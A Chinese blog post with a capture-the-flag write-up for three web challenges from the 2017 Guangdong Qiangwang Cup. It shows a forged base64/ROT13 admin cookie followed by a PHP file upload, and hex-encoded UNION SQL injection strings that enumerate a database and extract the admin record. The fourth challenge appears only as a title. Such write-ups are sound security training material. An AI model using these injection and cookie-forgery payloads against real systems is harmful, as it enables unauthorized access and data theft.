i春秋ctf---2017广东省强网杯---web---writeup

最新推荐文章于 2021-01-28 05:07:46 发布
最新推荐文章于 2021-01-28 05:07:46 发布
阅读量581 收藏 1
点赞数
分类专栏: # CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44108455/article/details/102989701
版权

本文特别感谢https://www.cnblogs.com,真的给了·很多帮助,万分感谢

broken

打开是这样的:
在这里插入图片描述点击 file ,出现jsfuck代码,
Jsfuck代码的执行方法:
①复制
②打开firefox浏览器
③按下F12
④选择上方的控制台
⑤在下方粘贴是jsfuck代码
⑥按下回车即可运行
在这里插入图片描述
在这里插入图片描述 把jsfuck代码放到控制器里运行,按照代码表进行审计,发现有[]没有闭合,把最后的()删掉,加上 ] ,解析出 Array[…],点击打开即可得到flag。
在这里插入图片描述
在这里插入图片描述

who are you?

在这里插入图片描述

打开页面没有任何提示,抓包看看,出现了cookie,先用base64解码看看

在这里插入图片描述
解码后得到 f:5:“thrfg”;
在这里插入图片描述
然后还是看不懂,原来是一个ROT13编码,解码后得到 s:5:“guest”;
在这里插入图片描述
猜测可以将guest修改为admin,然后进行ROT13加密,base64加密,在给cookie。

ROT13加密之后是 f:5:“nqzva” , 在base64加密 :Zjo1OiJucXp2YSI7ICA附上在线ROT13加解密在线工具:
https://www.qqxiuzi.cn/bianma/ROT5-13-18-47.php
在这里插入图片描述显示 Hello admin, now you can upload something you are easy to forget.
我们从源码得到提示,需要post上传两个文件
先构造一下变量:filename=1.php&data[]=<?php phpinfo();?>
在这里插入图片描述 查看页面返回了文件的上传路径,按照这个路径去找flag,拿到flag
在这里插入图片描述

phone number

点击链接,弹框“Please login!”,点击 “确定”,出现一个登录框
在这里插入图片描述 随便输个账号密码,显示“Password error!”, 那就注册一个吧!
在这里插入图片描述 注册进去之后,发现有两个功能,查电话号码和登出
在这里插入图片描述 由于这个题基本都是sql的一些操作,所以怀疑sql注入
尝试注册 注入语 的电话, 输入电话为1 order by 5
发现phone这个框里的长度有限制,
在这里插入图片描述将长度修改之后,弹框"phone must be numbers"
在这里插入图片描述 或许可以使用编码试试,
用小葵转码试试,给我转!
在这里插入图片描述经过尝试,16进制编码可用,注册之后,登录,就出现了下方页面,说明可以把16进制编码 正常解析
在这里插入图片描述点击“check”,报错,看来真的存在sql注入
在这里插入图片描述
说明字段名并不是五个,几次尝试之后,字段数是1
当使用1 order by 1并转化为16进制编码时,回显正常,没有报错。
在这里插入图片描述1.爆数据库名:
1 and 1=2 union select database()
16进制编码0x3120616E6420313D3220756E696F6E2073656C6563742064617461626173652829
数据库名为 “webdb”在这里插入图片描述2.爆表名:
1 union select table_name from information_schema.tables where table_schema=database()
16进制编码0x3120756E696F6E2073656C656374207461626C655F6E616D652066726F6D20696E666F726D6174696F6E5F736368656D612E7461626C6573207768657265207461626C655F736368656D613D64617461626173652829
爆出表名为“user”
在这里插入图片描述
在这里插入图片描述3.爆列名:
1 and 1=2 union select column_name from information_schema.columns where table_name="user"
16进制编码:0x3120616E6420313D3220756E696F6E2073656C65637420636F6C756D6E5F6E616D652066726F6D20696E666F726D6174696F6E5F736368656D612E636F6C756D6E73207768657265207461626C655F6E616D653D227573657222
在这里插入图片描述
在这里插入图片描述爆出好多列,但是最有用的应该就是下面几个
联系题目说 admin 存在大秘密,猜测 当username为admin时,就会有flag
构造sql语句1 and 1=2 union select phone from user where username="admin"
16进制编码为0x3120616E6420313D3220756E696F6E2073656C6563742070686F6E652066726F6D207573657220776865726520757365726E616D653D2261646D696E22
在这里插入图片描述

Musee de X

gclome
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
I春秋——web Write up(三)
Lemon's blog
09-27 698
前言:继续总结,学习更多关于web知识和练习编写脚本的能力。 GetFlag 一个登陆框加上验证码,不过有一点不同的是substr(md5(captcha), 0, 6)=e7e24a,截取MD5加密后验证码的前6位,而且需要等于后面的值(后面的值是变化的) 那就属于MD5碰撞了,就模仿大师傅写一个python脚本跑一下 import requests //requests库是一个常用的用于ht...
"360春秋杯"线上赛 web Writeup
Bendawang's Blog
04-21 3638
“360春秋杯”线上赛 web Writeup
I春秋——web Write up(一)
Lemon's blog
07-19 406
前言:总结一下最近做的web题,从题中可以学习到很多知识。 爆破-1 <?php include "flag.php"; $a = @$_REQUEST['hello']; if(!preg_match('/^\w*$/',$a )){ die('ERROR'); } eval("var_dump($$a);"); show_source(__FILE__); ?> 给了一段P...
I春秋——web Write up(二)
Lemon's blog
09-25 446
前言:最近都没有更新过,感觉博客快荒废了,得更新了[]( ̄▽ ̄)*,这次总结一下做的一些web题。 一、Not Found 打开页面便是404,但是下面有一个404.php,访问一下 除下有出题人的haha,没有其他信息了,御剑扫一下 打开页面,发现也没有有用的信息 重新回到原点,看看是不是漏掉些什么,看了出题人的提示 加上一个奇怪的参数 是不是和HTTP请求方式有关,百度查下 HT...
i春秋2020新春公益赛WEB复现Writeup
A_dmin的博客
02-24 3389
Day1 简单的招聘系统 ezupload babyphp 盲注 Day2 blacklist Ezsqli easysqli_copy Day3 Flaskapp easy_thinking ezExpress node_game
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
CTF-100题.-天天练习-学习
11-01
CTF-100题.-----------------天天练习------------------学习 100小题,试例练习
CTF-Web-Challenge:使用PHP在Web中进行CTF挑战
03-25
在这个"CTF-Web-Challenge"中,你将有机会学习和实践如何在Web环境中识别和利用漏洞。 PHP是一种广泛使用的服务器端脚本语言,特别适合开发动态网站。在CTF挑战中,你可能会遇到的PHP相关知识点包括: 1. **PHP...
CTF-MISC关于各类编码习题(湖工商扛把子)
最新发布
03-17
在“CTF-MISC关于各类编码习题(湖工商扛把子)”这个主题中,你可以通过实践和解决1-1等文件中的题目,进一步提升自己在编码解码方面的技能。了解和熟练掌握这些编码方式对于CTF比赛中的Misc任务至关重要,能够帮助...
i春秋 Crypto Writeup
NYX的博客
08-09 699
RSA? 题目: N=0x180be86dc898a3c3a710e52b31de460f8f350610bf63e6b2203c08fddad44601d96eb454a34dab7684589bc32b19eb27cffff8c07179e349ddb62898ae896f8c681796052ae1598bd41f35491175c9b60ae2260d0d4ebac05b4b6f2677a7609c2fe6194fe7b63841cec632e3a2f55d0cb09df08eacea34394ad
i 春秋 web 题 <include>
慢慢变小佬的博客
08-22 2006
打开链接地址:http://454e308408314446b0961f6226b502e7ad8cd9afd5614658.game.ichunqiu.com/ 题题目中以给出提示,这是文件包含题,打开题目链接后出现: 代码中包含一个phpinfo.php文件,试着去打开这个文件,什么也没有发现。而且可以发现改代码是没有防护的文件包含。 既然是关于php的,可以使用php协议 在该链接下...
i春秋2017第二届广东省强网杯线上赛Nonstandard题目writeup
iqiqiya的博客
08-20 1439
0x01:运行之后就提示让输入flag   如果输入不正确 就退出   0x02:PEiD查壳发现没有加壳  VC的程序     0x03:IDA载入分析  关键字符串  双击进入       双击进入   F5大法  找到关键代码   既然关键在于sub_401480这个函数   那就双击进入一探究竟   现在就明白了  我们的input经过sub_...
i春秋web-SQLi(过滤逗号的注入--join注入技巧)
Sea_Sand息禅
05-21 2325
逗号被过滤之下需要一些注入技巧,本文为其中一种,另一种参考https://blog.csdn.net/zz_Caleb/article/details/88933173。 题目是SQLi,应该是个注入的题,进来之后直接就是b68a89d1c4a097a9d8631b3ac45e8979.php,一般应该是index.php的,这里可能是有一个重定向,看一下页面源码: 于是访问了login.php...
i-春秋-2017第二届广东省强网杯线上赛who are you?
Fisher
05-06 381
2017第二届广东省强网杯线上赛who are you? WEB赛题 拿到之后提示说没有权限 于是用火狐看cookie ,写的 role:Zjo1OiJ0aHJmZyI7 将Zjo1OiJ0aHJmZyI7解密base64 f:5:"thrfg" 扔到凯撒密码里看到 f:5:"thrfg 根据大佬说是rot13, 解码得到s:5:“guest”* 之后将guest换成admin,在s:5:“adm...
CTF writeup 1_网络安全实验室
热门推荐
Troy
10-26 31万+
基础关1.key在哪里? 过关地址打开网址 “key就在这里中,你能找到他吗? ” 看看源代码有没有线索~果然<html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> </head> <body> key就在这里中,你能找到他吗?
[CTF]No.0007 [强网杯] phone number
林毅洋
05-14 878
[CTF]No.0006 [强网杯] phone number Phone number is a good thing. 来源:强网杯-第二届-WEB 类别:16进制绕过 sql注入 来源:https://gdqwb2017.ichunqiu.com/competition/index 用到工具:无 尝试 进入地址,首先alert一个please login!接着跳转到首页
i春秋ctf夺旗赛(第四季)writeup——web
jammny
01-06 1724
前言: 这次的比赛一共有六道web题,接下我会详细介绍解题的步骤以及思路,以便让小白和没有接触过这类题型的小伙伴们能读懂。 第一题,nani 1、打开网页啥都没有,内容一片空白啥。这时候我们应该按F12去查看网页源码。往往很多提示和关键性信息都藏在这里。如图所示: 2、得到提示:./index.php?file=show.php ;看到关键字file,下意识想会不会存在文件包含呢?不急,我们先去访...
mysql注入ctf_CTF SQL注入
weixin_42510026的博客
01-28 638
一、宽字节注入原理:GBK编码、URL转码利用mysql的一个特性,mysql在使用GBK编码的时候,会认为两个字符是一个汉字(前一个ASCII码要大于128,才到汉字的范围)例如:' -> ' -> %5C%27%df' -> %df' -> %df%5C%27sql字符集特性MYSQL 中 utf8_unicode_ci 和 utf8_general...
ctf-qsnctf此地无银三百
02-20
ctf-qsnctf是一个CTF(Capture The Flag)比赛平台,它提供了一系列的网络安全挑战,旨在帮助参与者提升网络安全技能和解决问题的能力。在ctf-qsnctf平台上,参与者可以通过解决各种类型的题目来获取旗帜(flag),...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值